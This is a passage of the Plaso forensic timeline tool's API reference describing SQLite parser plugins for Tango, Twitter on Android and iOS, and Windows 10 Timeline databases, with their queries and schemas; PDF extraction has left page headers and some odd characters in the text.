SCHEMAS = [{'profiles': 'CREATE TABLE `profiles` (`key` TEXT PRIMARY KEY, `value` TEXT)', 'profiletable': 'CREATE TABLE `profiletable` (ìtemUserId` TEXT PRIMARY KEY, ìtemFirstName` TEXT NOT NULL, ìtemLastName` TEXT NOT NULL, ìtemBirthday` TEXT NOT NULL, ìtemGender` TEXT NOT NULL, ìtemStatus` TEXT NOT NULL, ìtemLastActiveTime` BIGINT NOT NULL, ìtemDistance` DOUBLE NOT NULL, ìtemCity` TEXT NOT NULL, ìtemGeoCountryCode` TEXT NOT NULL, ìtemAvatarUrl` TEXT NOT NULL, ìtemThumbnailUrl` TEXT NOT NULL, ìtemVideoUrl` TEXT NOT NULL, ìtemVideoThumbnailUrl` TEXT NOT NULL, ìtemBackgroundUrl` TEXT NOT NULL, ìtemIsFriend` INTEGER NOT NULL, ìtemIsBlocked` INTEGER NOT NULL, ìtemFriendRequestType` TEXT NOT NULL, ìtemReverseRelationships` TEXT NOT NULL, ìtemFavoriterCount` INTEGER NOT NULL, ìtemFavoritingCount` INTEGER NOT NULL, ìtemFeedCount` INTEGER NOT NULL, ìtemRefereneCount` INTEGER NOT NULL, ìtemLevel1DataSyncTime` BIGINT NOT NULL, ìtemLevel2DataSyncTime` BIGINT NOT NULL, ìtemLevel3DataSyncTime` BIGINT NOT NULL, ìtemLevel4DataSyncTime` BIGINT NOT NULL, ìtemLevel5DataSyncTime` BIGINT NOT NULL, ìtemLastLocalAccessTime` BIGINT NOT NULL, ìtemFriendRequestId` TEXT NOT NULL, ìtemFriendRequestMessage` TEXT NOT NULL, ìtemFriendRequestTime` BIGINT NOT NULL, ìtemIsNewFriendRequest` INTEGER NOT NULL, ìtemFriendRequestTCMessageId` INTEGER NOT NULL, ìtemFriendRequestContext` TEXT NOT NULL, ìtemFriendRequestAttachedPostType` INTEGER NOT NULL, ìtemFriendRequestAttachedPostContent` TEXT NOT NULL, ìtemFriendRequestHasBeenForwardedToTc` INTEGER NOT NULL, ìtemProfileType` TEXT NOT NULL, ìtemDatingAge` INTEGER NOT NULL, ìtemDatingLocationString` TEXT NOT NULL, ìtemDatingSeekingString` TEXT NOT NULL, ìtemDatingEssayText` TEXT NOT NULL, ìtemDatingBodyType` TEXT NOT NULL, ìtemDatingLastActive` TEXT NOT NULL, ìtemDatingProfileUrl` TEXT NOT NULL, ìtemLastTimeOfLikeProfile` BIGINT NOT NULL, ìtemIsHidden` INTEGER NOT NULL, ìtemPrivacy` INTEGER NOT NULL, ìtemCanSeeMyPost` INTEGER NOT NULL, ìtemCanShareMyPost` INTEGER NOT NULL, ìtemCanContactMe` INTEGER NOT NULL)'}] class plaso.parsers.sqlite_plugins.tango_android.TangoAndroidTCPlugin Bases: plaso.parsers.sqlite_plugins.interface.SQLitePlugin SQLite parser plugin for Tango on Android TC database files. DATA_FORMAT = 'Tango on Android TC SQLite database file' NAME = 'tango_android_tc' ParseConversationRow(parser_mediator, query, row, **unused_kwargs) Parses a conversation row from the database. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • query (str) – query that created the row. • row (sqlite3.Row) – row resulting from query. ParseMessageRow(parser_mediator, query, row, **unused_kwargs) Parses a message row from the database. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • query (str) – query that created the row. • row (sqlite3.Row) – row resulting from query.

302 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

QUERIES = [('SELECT conversations.conv_id AS conv_id, conversations.payload AS payload FROM conversations', 'ParseConversationRow'), ('SELECT messages.create_time AS create_time, messages.send_time AS send_time, messages.msg_id AS msg_id, messages.payload AS payload, messages.direction AS direction FROM messages LEFT JOIN likes ON messages.msg_id = likes.msg_id', 'ParseMessageRow')] REQUIRED_STRUCTURE = {'conversations': frozenset({'conv_id', 'payload'}), 'likes': frozenset({'msg_id'}), 'messages': frozenset({'create_time', 'direction', 'msg_id', 'payload', 'send_time'})} SCHEMAS = [{'conversations': 'CREATE TABLE `conversations` (`conv_id` TEXT PRIMARY KEY, `conv_type` INTEGER DEFAULT 0, `payload` BLOB, `last_msg_id` INTEGER, ùnread_count` INTEGER, `last_read_sent_msg_id` INTEGER, `conv_del_status` INTEGER DEFAULT 0, `deleting_ts` BIGINT DEFAULT 0, `conv_restore_status` INTEGER DEFAULT 0, `peers_read` TEXT, `total_received_msg_count` INTEGER DEFAULT -1, `communication_context` INTEGER DEFAULT 0)', 'games': 'CREATE TABLE `games` (`game_session_id` TEXT PRIMARY KEY, `message_id` INTEGER, `conversation_id` TEXT, `game_id` TEXT, `game_state` INTEGER, àction_timestamp` BIGINT, `current_player_account_id` TEXT)', 'likes': 'CREATE TABLE `likes` (`msg_id` INTEGER PRIMARY KEY, `global_msg_id` TEXT, `conv_id` TEXT, `liker_aid` TEXT, àct_type` INTEGER, `status` INTEGER, àct_ts` BIGINT, `payload` BLOB)', 'messages': 'CREATE TABLE `messages` (`msg_id` INTEGER PRIMARY KEY, `conv_id` TEXT, `type` INTEGER, `media_id` TEXT, `share_id` TEXT, `create_time` BIGINT, `send_time` BIGINT, `direction` INTEGER, `status` INTEGER, `payload` BLOB, `del_status` INTEGER)', 'profiles': 'CREATE TABLE `profiles` (`key` TEXT PRIMARY KEY, `value` TEXT)', 'receipts': 'CREATE TABLE `receipts` (`conv_id` TEXT PRIMARY KEY, `msg_id` INTEGER, `sender_msg_id` INTEGER, `sender_aids` TEXT, `type` INTEGER, `create_time` BIGINT, `status` INTEGER, `payload` BLOB)', 'sms': 'CREATE TABLE `sms` (`msg_id` INTEGER PRIMARY KEY, `phonenumber` TEXT, `text` TEXT)'}] plaso.parsers.sqlite_plugins.twitter_android module

SQLite parser plugin for Twitter on Android database files. class plaso.parsers.sqlite_plugins.twitter_android.TwitterAndroidContactEventData Bases: plaso.containers.events.EventData Twitter on Android contact event data. description twitter account profile description. Type str followers number of followers. Type int friends number of following. Type int identifier contact row id. Type int

5.1. Subpackages 303 Plaso (log2timeline), Release 20210606

image_url profile picture url. Type str location twitter account profile location content. Type str name twitter account name. Type str query SQL query that was used to obtain the event data. Type str statuses twitter account number of tweets. Type int user_identifier twitter account id. Type int username twitter account handler. Type str web_url twitter account profile url content. Type str DATA_TYPE = 'twitter:android:contact' class plaso.parsers.sqlite_plugins.twitter_android.TwitterAndroidPlugin Bases: plaso.parsers.sqlite_plugins.interface.SQLitePlugin SQLite parser plugin for Twitter on Android database files. DATA_FORMAT = 'Twitter on Android SQLite database file' NAME = 'twitter_android' ParseContactRow(parser_mediator, query, row, **unused_kwargs) Parses a status row from the database. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • query (str) – query that created the row. • row (sqlite3.Row) – row resulting from query. ParseSearchRow(parser_mediator, query, row, **unused_kwargs) Parses a search row from the database. Parameters

304 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • query (str) – query that created the row. • row (sqlite3.Row) – row resulting from query. ParseStatusRow(parser_mediator, query, row, **unused_kwargs) Parses a status row from the database. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • query (str) – query that created the row. • row (sqlite3.Row) – row resulting from query. QUERIES = [('SELECT name, query, time FROM search_queries', 'ParseSearchRow'), ('SELECT statuses._id AS _id, statuses.author_id AS author_id, users.username AS username, statuses.content AS content, statuses.created AS time, statuses.favorited AS favorited, statuses.retweeted AS retweeted FROM statuses LEFT JOIN users ON statuses.author_id = users.user_id', 'ParseStatusRow'), ('SELECT _id, user_id, username, name, profile_created, description, web_url, location, followers, friends, statuses, image_url, updated, friendship_time FROM users', 'ParseContactRow')] REQUIRED_STRUCTURE = {'search_queries': frozenset({'name', 'query', 'time'}), 'statuses': frozenset({'_id', 'author_id', 'content', 'created', 'favorited', 'retweeted'}), 'users': frozenset({'_id', 'description', 'followers', 'friends', 'friendship_time', 'image_url', 'location', 'name', 'profile_created', 'statuses', 'updated', 'user_id', 'username', 'web_url'})}

5.1. Subpackages 305 Plaso (log2timeline), Release 20210606

SCHEMAS = [{'activities': 'CREATE TABLE activities (_id INTEGER PRIMARY KEY,type INT,event INT,created_at INT,hash INT,max_position INT,min_position INT,sources_size INT,source_type INT,sources BLOB,targets_size INT,target_type INT,targets BLOB,target_objects_size INT,target_object_type INT,target_objects BLOB,is_last INT,tag INT,magic_rec_id INT,UNIQUE (type, max_position) ON CONFLICT REPLACE)', 'ads_account_permissions': 'CREATE TABLE ads_account_permissions (_id INTEGER PRIMARY KEY,promotable_users BLOB,last_synced INT NOT NULL)', 'android_metadata': 'CREATE TABLE android_metadata (locale TEXT)', 'business_profiles': 'CREATE TABLE business_profiles (_id INTEGER PRIMARY KEY,user_id INT UNIQUE NOT NULL,business_profile BLOB,last_synced INT NOT NULL)', 'card_state': 'CREATE TABLE card_state (_id INTEGER PRIMARY KEY AUTOINCREMENT,card_status_id INT,card_id INT, card_state BLOB)', 'category_timestamp': 'CREATE TABLE category_timestamp (_id INTEGER PRIMARY KEY,cat_status_id INT NOT NULL,cat_tag INT NOT NULL,cat_timestamp INT NOT NULL)', 'clusters': 'CREATE TABLE clusters (_id INTEGER PRIMARY KEY,cl_cluster_id TEXT UNIQUE NOT NULL,cl_type INT,cl_title TEXT,cl_subtitle TEXT,cl_size INT,cl_timestamp INT,cl_content BLOB)', 'conversation_entries': 'CREATE TABLE conversation_entries (_id INTEGER PRIMARY KEY,entry_id INT UNIQUE NOT NULL,sort_entry_id INT UNIQUE NOT NULL,conversation_id TEXT,user_id INT,created INT,entry_type INT,data BLOB,request_id TEXT)', 'conversation_participants': 'CREATE TABLE conversation_participants (_id INTEGER PRIMARY KEY,conversation_id TEXT NOT NULL,user_id TEXT NOT NULL,join_time INT NOT NULL,participant_type INT NOT NULL)', 'conversations': 'CREATE TABLE conversations (_id INTEGER PRIMARY KEY,conversation_id TEXT UNIQUE NOT NULL,title TEXT,avatar_url TEXT,type INT,sort_event_id BIGINT,last_readable_event_id BIGINT,last_read_event_id BIGINT,sort_timestamp BIGINT,is_muted INT,min_event_id BIGINT,is_hidden INT,has_more INT,read_only INT)', 'cursors': 'CREATE TABLE cursors (_id INTEGER PRIMARY KEY,kind INT,type INT,owner_id INT,ref_id TEXT,next TEXT)', 'dismiss_info': 'CREATE TABLE dismiss_info(timeline_id INTEGER REFERENCES timeline(_id),feedback_action_id INTEGER REFERENCES feedback_action(_id),UNIQUE(timeline_id,feedback_action_id))', 'feedback_action': 'CREATE TABLE feedback_action(_id INTEGER PRIMARY KEY AUTOINCREMENT,feedback_type TEXT,prompt TEXT,confirmation TEXT,UNIQUE(feedback_type,prompt,confirmation))', 'list_mapping': 'CREATE TABLE list_mapping (_id INTEGER PRIMARY KEY,list_mapping_list_id TEXT,list_mapping_type INT,list_mapping_user_id INT,list_is_last INT)', 'locations': 'CREATE TABLE locations (_id INTEGER PRIMARY KEY,name TEXT,woeid INT,country TEXT,country_code TEXT)', 'moments': 'CREATE TABLE moments (_id INTEGER PRIMARY KEY,title TEXT NOT NULL,can_subscribe INT,is_live INT,is_sensitive INT,subcategory_string TEXT,subcategory_favicon_url TEXT,time_string TEXT,duration_string TEXT,is_subscribed INT,description TEXT NOT NULL,moment_url TEXT,num_subscribers INT,author_info BLOB,promoted_content BLOB)', 'moments_guide': 'CREATE TABLE moments_guide (_id INTEGER PRIMARY KEY,moment_id INT NOT NULL,section_id INT NOT NULL,tweet_id INT NOT NULL, crop_data BLOB,media_id INT,media_url TEXT,media_size BLOB,FOREIGN KEY(section_id) REFERENCES moments_sections(_id) ON DELETE CASCADE)', 'moments_guide_categories': 'CREATE TABLE moments_guide_categories (_id INTEGER PRIMARY KEY,category_id TEXT NOT NULL,is_default_category INT NOT NULL,category_name TEXT NOT NULL,fetch_timestamp INT NOT NULL)', 'moments_guide_user_states': 'CREATE TABLE moments_guide_user_states (_id INTEGER PRIMARY KEY,moment_id INT NOT NULL,is_read INT,is_updated INT,FOREIGN KEY(moment_id) REFERENCES moments(_id) ON DELETE CASCADE)', 'moments_pages': 'CREATE TABLE moments_pages (_id INTEGER PRIMARY KEY,moment_id INT NOT NULL,page_id TEXT,type BLOB,tweet_id INT,display_mode BLOB,page_number INT,crop_data BLOB,theme_data BLOB,media_id INT,media_size BLOB,media_url TEXT,last_read_timestamp INT,FOREIGN KEY(moment_id) REFERENCES moments(_id))', 'moments_sections': 'CREATE TABLE moments_sections (_id INTEGER PRIMARY KEY,section_title TEXT,section_type BLOB NOT NULL,section_group_id TEXT,section_group_type INT NOT NULL)', 'moments_visit_badge': 'CREATE TABLE moments_visit_badge (_id INTEGER PRIMARY KEY,moment_id INT UNIQUE NOT 306 NULL,is_new_since_visit INT,is_updated_since_visit INT)', 'newsChapter': 'CREATE 5. plaso TABLE package news (_id INTEGER PRIMARY KEY AUTOINCREMENT,country TEXT,language TEXT,topic_id INT,news_id TEXT,title TEXT,image_url TEXT,author_name TEXT,article_description TEXT,article_url TEXT,tweet_count INT,start_time INT,news_id_hash INT)', 'notifications': 'CREATE TABLE notifications (_id INTEGER PRIMARY KEY,type INT,notif_id INT,source_user_name TEXT,s_name TEXT,s_id INT,notif_txt TEXT,aggregation_data TEXT,notif_extra_data BLOB)', 'one_click': 'CREATE TABLE one_click (_id INTEGER PRIMARY KEY,topic TEXT,filter_name TEXT,filter_location TEXT,filter_follow INT)', 'order_history': 'CREATE TABLE order_history (_id INTEGER PRIMARY KEY,ordered_at INT ,order_id INT ,data BLOB)', 'promoted_retry': 'CREATE TABLE promoted_retry(impression_id TEXT,event INT NOT NULL,is_earned INT NOT NULL,trend_id INT,num_retries INT NOT NULL,url TEXT,video_playlist_url TEXT,video_content_uuid TEXT,video_content_type TEXT,video_cta_url TEXT,video_cta_app_id TEXT,video_cta_app_name TEXT,card_event TEXT,PRIMARY KEY(impression_id,event,is_earned,trend_id))', 'prompts': 'CREATE TABLE prompts (_id INTEGER PRIMARY KEY,p_id INT,p_format TEXT,p_template TEXT,p_header TEXT,p_text TEXT,p_action_text TEXT,p_action_url TEXT,p_icon TEXT,p_background_image_url TEXT,p_persistence TEXT,p_entities BLOB,p_header_entities BLOB,p_status_id LONG,p_insertion_index INT,p_trigger TEXT)', 'rankings': 'CREATE TABLE rankings (_id INTEGER PRIMARY KEY AUTOINCREMENT,country TEXT,language TEXT,granularity TEXT,category TEXT,date INT)', 'search_queries': 'CREATE TABLE search_queries (_id INTEGER PRIMARY KEY,type INT,name TEXT NOT NULL,query TEXT NOT NULL,query_id INT,time INT,latitude REAL,longitude REAL,radius REAL,location TEXT,pc BLOB,cluster_titles BLOB)', 'search_results': 'CREATE TABLE search_results (_id INTEGER PRIMARY KEY,search_id INT,s_type INT,data_type INT,type_id INT,polled INT,data_id INT,related_data BLOB,cluster_id INT)', 'search_suggestion_metadata': 'CREATE TABLE search_suggestion_metadata (_id INTEGER PRIMARY KEY,type INT,last_update LONG)', 'status_groups': 'CREATE TABLE status_groups (_id INTEGER PRIMARY KEY,tweet_type INT DEFAULT 0,type INT,sender_id INT,owner_id INT,ref_id INT,tag INT,g_status_id INT,is_read INT,page INT,is_last INT,updated_at INT,timeline INT,pc BLOB,g_flags INT,preview_draft_id INT,preview_media BLOB,tweet_pivots BLOB)', 'status_metadata': 'CREATE TABLE status_metadata (_id INTEGER PRIMARY KEY,owner_id INT NOT NULL,status_id INT NOT NULL,status_group INT NOT NULL,status_group_tag INT NOT NULL,soc_type INT,soc_name TEXT,soc_second_name TEXT,soc_others_count INT,soc_fav_count INT,soc_rt_count INT,reason_icon_type TEXT,reason_text TEXT,scribe_component TEXT,scribe_data BLOB,highlights TEXT)', 'statuses': 'CREATE TABLE statuses (_id INTEGER PRIMARY KEY,status_id INT UNIQUE NOT NULL,author_id INT,content TEXT,source TEXT,created INT,in_r_user_id INT,in_r_status_id INT,favorited INT,latitude TEXT,longitude TEXT,place_data BLOB,entities TEXT,retweet_count INT,r_content TEXT,cards BLOB,flags INT,favorite_count INT,lang TEXT,supplemental_language TEXT,view_count INT,quoted_tweet_data BLOB,quoted_tweet_id INT,retweeted INT)', 'stories': 'CREATE TABLE stories ( _id INTEGER PRIMARY KEY,story_id TEXT,story_order INT,story_type INT,story_proof_type INT,story_proof_addl_count INT,data_type INT,data_id INT,story_is_read INT,story_meta_title TEXT,story_meta_subtitle TEXT,story_meta_query TEXT,story_meta_header_img_url TEXT,story_source TEXT,story_impression_info TEXT,story_tag INT)', 'timeline': 'CREATE TABLE timeline (_id INTEGER PRIMARY KEY AUTOINCREMENT,owner_id INT,type INT,sort_index INT,entity_id INT,entity_type INT,data_type INT,data_type_group INT,data_type_tag INT,timeline_tag TEXT,timeline_group_id INT,timeline_scribe_group_id INT,data_id INT,data BLOB,flags INT,updated_at INT,data_origin_id TEXT,is_last INT,is_read INT,scribe_content BLOB,timeline_moment_info BLOB,dismissed INT NOT NULL DEFAULT 0,dismiss_actions INT NOT NULL DEFAULT 0)', 'tokens': 'CREATE TABLE tokens (_id INTEGER PRIMARY KEY,text TEXT,weight INT,type INT,ref_id INT)', 'topics': 'CREATE TABLE topics (_id INTEGER PRIMARY KEY,ev_id TEXT UNIQUE NOT NULL,ev_type INT,ev_query TEXT NOT NULL,ev_seed_hashtag TEXT,ev_title STRING,ev_subtitle STRING,ev_view_url STRING,ev_status STRING,ev_image_url TEXT,ev_explanation TEXT,ev_tweet_count INT,ev_start_time INT,ev_owner_id INT,ev_pc BLOB,ev_content BLOB,ev_hash INT)', 'user_groups': 'CREATE TABLE user_groups (_id INTEGER PRIMARY KEY,type INT,tag INT,rank INT,owner_id INT,user_id INT,is_last INT,pc BLOB,g_flags INT)', 'user_metadata': 'CREATE TABLE user_metadata (_id INTEGER PRIMARY KEY,owner_id INT NOT NULL,user_id INT NOT NULL,user_group_type INT NOT NULL,user_group_tag INT NOT NULL,soc_type INT,soc_name TEXT,soc_follow_count INT,user_title TEXT,token TEXT)', 'users': 'CREATE TABLE users (_id INTEGER PRIMARY KEY,user_id INT UNIQUE NOT NULL,username TEXT,name TEXT,description TEXT,web_url TEXT,bg_color INT,location TEXT,structured_location BLOB,user_flags INT,followers INT,fast_followers INT DEFAULT 0,friends INT,statuses INT,profile_created INT,image_url TEXT,hash INT,updated INT,friendship INT,friendship_time INT,favorites INT DEFAULT 0,header_url TEXT,description_entities BLOB,url_entities BLOB,media_count INT,extended_profile_fields BLOB,pinned_tweet_id INT,link_color INT,advertiser_type TEXT,business_profile_state TEXT)'}] Plaso (log2timeline), Release 20210606 class plaso.parsers.sqlite_plugins.twitter_android.TwitterAndroidSearchEventData Bases: plaso.containers.events.EventData Twitter on Android search event data. name twitter name handler. Type str query SQL query that was used to obtain the event data. Type str search_query search query. Type str DATA_TYPE = 'twitter:android:search' class plaso.parsers.sqlite_plugins.twitter_android.TwitterAndroidStatusEventData Bases: plaso.containers.events.EventData Twitter on Android status event data. author_identifier twitter account identifier. Type int content status content. Type str favorited favorited flag as 0/1 value. Type int identifier status row identifier. Type int query SQL query that was used to obtain the event data. Type str retweeted retweeted flag as 0/1 value. Type int username twitter account handler. Type str DATA_TYPE = 'twitter:android:status'

5.1. Subpackages 307 Plaso (log2timeline), Release 20210606 plaso.parsers.sqlite_plugins.twitter_ios module

SQLite parser plugin for Twitter on iOS 8+ database files. class plaso.parsers.sqlite_plugins.twitter_ios.TwitterIOSContactEventData Bases: plaso.containers.events.EventData Twitter on iOS 8+ contact event data. description description of the profile. Type str followers_count number of accounts following the contact. Type int following_count number of accounts the contact is following. Type int following 1 if the contact is following the user’s account, 0 if not. Type int location location of the profile. Type str name name of the profile. Type str profile_url URL of the profile picture. Type str query SQL query that was used to obtain the event data. Type str screen_name screen name. Type str url URL of the profile. Type str DATA_TYPE = 'twitter:ios:contact' class plaso.parsers.sqlite_plugins.twitter_ios.TwitterIOSPlugin Bases: plaso.parsers.sqlite_plugins.interface.SQLitePlugin SQLite parser plugin for Twitter on iOS 8+ database files.

308 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

The Twitter on iOS 8+ database file is typically stored in: /private/var/mobile/Containers/Data/Application/Library/Caches/databases/ twitter.db DATA_FORMAT = 'Twitter on iOS 8 and later SQLite database (twitter.db) file' NAME = 'twitter_ios' ParseContactRow(parser_mediator, query, row, **unused_kwargs) Parses a contact row from the database. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • query (str) – query that created the row. • row (sqlite3.Row) – row resulting from query. ParseStatusRow(parser_mediator, query, row, **unused_kwargs) Parses a contact row from the database. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • query (str) – query that created the row. • row (sqlite3.Row) – row resulting from query. QUERIES = [('SELECT createdDate, updatedAt, screenName, name, profileImageUrl,location, description, url, following, followersCount, followingCount FROM Users ORDER BY createdDate', 'ParseContactRow'), ('SELECT Statuses.date AS date, Statuses.text AS text, Statuses.userId AS user_id, Users.name AS name, Statuses.retweetCount AS retweetCount, Statuses.favoriteCount AS favoriteCount, Statuses.favorited AS favorited, Statuses.updatedAt AS updatedAt FROM Statuses LEFT join Users ON Statuses.userId = Users.id ORDER BY date', 'ParseStatusRow')] REQUIRED_STRUCTURE = {'Statuses': frozenset({'date', 'favoriteCount', 'favorited', 'retweetCount', 'text', 'updatedAt', 'userId'}), 'Users': frozenset({'createdDate', 'description', 'followersCount', 'following', 'followingCount', 'id', 'location', 'name', 'profileImageUrl', 'screenName', 'updatedAt', 'url'})}

5.1. Subpackages 309 Plaso (log2timeline), Release 20210606

SCHEMAS = [{'Lists': "CREATE TABLE Lists ( 'id' INTEGER PRIMARY KEY, 'name' TEXT, 'slug' TEXT, 'desc' TEXT, 'private' INTEGER, 'subscriberCount' INTEGER, 'memberCount' INTEGER, 'userId' INTEGER, 'updatedAt' REAL )", 'ListsShadow': "CREATE TABLE ListsShadow ( 'id' INTEGER PRIMARY KEY, 'name' TEXT, 'slug' TEXT, 'desc' TEXT, 'private' INTEGER, 'subscriberCount' INTEGER, 'memberCount' INTEGER, 'userId' INTEGER, 'updatedAt' REAL )", 'MyRetweets': "CREATE TABLE MyRetweets ( 'statusId' INTEGER PRIMARY KEY, 'myRetweetId' INTEGER )", 'Statuses': "CREATE TABLE Statuses ( 'id' INTEGER PRIMARY KEY, 'text' TEXT, 'date' REAL, 'userId' INTEGER, 'inReplyToStatusId' INTEGER, 'retweetedStatusId' INTEGER, 'geotag' BLOB, 'entities' BLOB, 'card' BLOB, 'cardUsers' BLOB, 'primaryCardType' INTEGER, 'cardVersion' INTEGER, 'retweetCount' INTEGER, 'favoriteCount' INTEGER, 'favorited' INTEGER, 'updatedAt' REAL, 'extraScribeItem' BLOB, 'withheldScope' TEXT, 'withheldInCountries' TEXT, 'inReplyToUsername' TEXT, 'possiblySensitive' INTEGER, 'isPossiblySensitiveAppealable' INTEGER, 'isLifelineAlert' INTEGER, 'isTruncated' INTEGER, 'previewLength' INTEGER, 'fullTextLength' INTEGER, 'lang' TEXT, 'supplmentalLanguage' TEXT, 'includeInProfileTimeline' INTEGER, 'quotedStatusId' INTEGER, 'source' TEXT )", 'StatusesShadow': "CREATE TABLE StatusesShadow ( 'id' INTEGER PRIMARY KEY, 'text' TEXT, 'date' REAL, 'userId' INTEGER, 'inReplyToStatusId' INTEGER, 'retweetedStatusId' INTEGER, 'geotag' BLOB, 'entities' BLOB, 'card' BLOB, 'cardUsers' BLOB, 'primaryCardType' INTEGER, 'cardVersion' INTEGER, 'retweetCount' INTEGER, 'favoriteCount' INTEGER, 'favorited' INTEGER, 'updatedAt' REAL, 'extraScribeItem' BLOB, 'withheldScope' TEXT, 'withheldInCountries' TEXT, 'inReplyToUsername' TEXT, 'possiblySensitive' INTEGER, 'isPossiblySensitiveAppealable' INTEGER, 'isLifelineAlert' INTEGER, 'isTruncated' INTEGER, 'previewLength' INTEGER, 'fullTextLength' INTEGER, 'lang' TEXT, 'supplementalLanguage' TEXT, 'includeInProfileTimeline' INTEGER, 'quotedStatusId' INTEGER, 'source' TEXT )", 'Users': "CREATE TABLE Users ( 'id' INTEGER PRIMARY KEY, 'screenName' TEXT COLLATE NOCASE, 'profileImageUrl' TEXT, 'profileBannerUrl' TEXT, 'profileLinkColorHexTriplet' INTEGER, 'name' TEXT, 'location' TEXT, 'structuredLocation' BLOB, 'description' TEXT, 'url' TEXT, 'urlEntities' BLOB, 'bioEntities' BLOB, 'protected' INTEGER, 'verified' INTEGER, 'following' INTEGER, 'deviceFollowing' INTEGER, 'advertiserAccountType' INTEGER, 'statusesCount' INTEGER, 'mediaCount' INTEGER, 'favoritesCount' INTEGER, 'followingCount' INTEGER, 'followersCount' INTEGER, 'followersCountFast' INTEGER, 'followersCountNormal' INTEGER, 'couldBeStale' INTEGER, 'isLifelineInstitution' INTEGER, 'hasCollections' INTEGER, 'updatedAt' REAL, 'createdDate' REAL, 'isTranslator' INTEGER, 'hasExtendedProfileFields' INTEGER, 'extendedProfileFields' BLOB, 'pinnedTweetId' INTEGER, 'businessProfileState' INTEGER, 'analyticsType' INTEGER )", 'UsersShadow': "CREATE TABLE UsersShadow ( 'id' INTEGER PRIMARY KEY, 'screenName' TEXT COLLATE NOCASE, 'profileImageUrl' TEXT, 'profileBannerUrl' TEXT, 'profileLinkColorHexTriplet' INTEGER, 'name' TEXT, 'location' TEXT, 'structuredLocation' BLOB, 'description' TEXT, 'url' TEXT, 'urlEntities' BLOB, 'bioEntities' BLOB, 'protected' INTEGER, 'verified' INTEGER, 'following' INTEGER, 'deviceFollowing' INTEGER, 'advertiserAccountType' INTEGER, 'statusesCount' INTEGER, 'mediaCount' INTEGER, 'favoritesCount' INTEGER, 'followingCount' INTEGER, 'followersCount' INTEGER, 'followersCountFast' INTEGER, 'followersCountNormal' INTEGER, 'couldBeStale' INTEGER, 'isLifelineInstitution' INTEGER, 'hasCollections' INTEGER, 'updatedAt' REAL, 'createdDate' REAL, 'isTranslator' INTEGER, 'hasExtendedProfileFields' INTEGER, 'extendedProfileFields' BLOB, 'pinnedTweetId' INTEGER, 'businessProfileState' INTEGER, 'analyticsType' INTEGER )"}] class plaso.parsers.sqlite_plugins.twitter_ios.TwitterIOSStatusEventData Bases: plaso.containers.events.EventData Parent class for Twitter on iOS 8+ status events.

310 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

favorite_count number of times the status message has been favorited. Type int favorited value to mark status as favorite by the account. Type int name user’s profile name. Type str query SQL query that was used to obtain the event data. Type str retweet_count number of times the status message has been retweeted. Type str text content of the status message. Type str user_id user unique identifier. Type int DATA_TYPE = 'twitter:ios:status' plaso.parsers.sqlite_plugins.windows_timeline module

SQLite parser plugin for Windows 10 Timeline database files. class plaso.parsers.sqlite_plugins.windows_timeline.WindowsTimelineGenericEventData Bases: plaso.containers.events.EventData Windows Timeline database generic event data. package_identifier the package ID or path to the executable run. Depending on the program, this either looks like a path (for example, c:python34python.exe) or like a package name (for example Docker.DockerForWindows.Settings). Type str description this is an optional field, used to describe the action in the timeline view, and is usually populated withthe path of the file currently open in the program described by package_identifier. Otherwise None. Type str application_display_name a more human-friendly version of the package_identifier, such as ‘Docker for Windows’ or ‘Microsoft Store’. Type str

5.1. Subpackages 311 Plaso (log2timeline), Release 20210606

DATA_TYPE = 'windows:timeline:generic' class plaso.parsers.sqlite_plugins.windows_timeline.WindowsTimelinePlugin Bases: plaso.parsers.sqlite_plugins.interface.SQLitePlugin SQLite parser plugin for Windows 10 Timeline database files. The Windows 10 Timeline database file is typically stored in: %APP- DATA%LocalConnectedDevicesPlatformL.ActivitiesCache.db DATA_FORMAT = 'Windows 10 Timeline SQLite database (ActivitiesCache.db) file' NAME = 'windows_timeline' ParseGenericRow(parser_mediator, query, row, **unused_kwargs) Parses a generic windows timeline row. Args: parser_mediator (ParserMediator): mediates interactions between parsers and other components, such as storage and dfvfs. query (str): query that created the row. row (sqlite3.Row): row. ParseUserEngagedRow(parser_mediator, query, row, **unused_kwargs) Parses a timeline row that describes a user interacting with an app. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • query (str) – query that created the row. • row (sqlite3.Row) – row. QUERIES = [('SELECT StartTime, Payload, PackageName FROM Activity INNER JOIN Activity_PackageId ON Activity.Id = Activity_PackageId.ActivityId WHERE instr(Payload, "UserEngaged") > 0 AND Platform = "packageid"', 'ParseUserEngagedRow'), ('SELECT StartTime, Payload, AppId FROM Activity WHERE instr(Payload, "UserEngaged") = 0', 'ParseGenericRow')] REQUIRED_STRUCTURE = {'Activity': frozenset({'AppId', 'Id', 'Payload', 'StartTime'}), 'Activity_PackageId': frozenset({'ActivityId', 'PackageName'})}

312 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

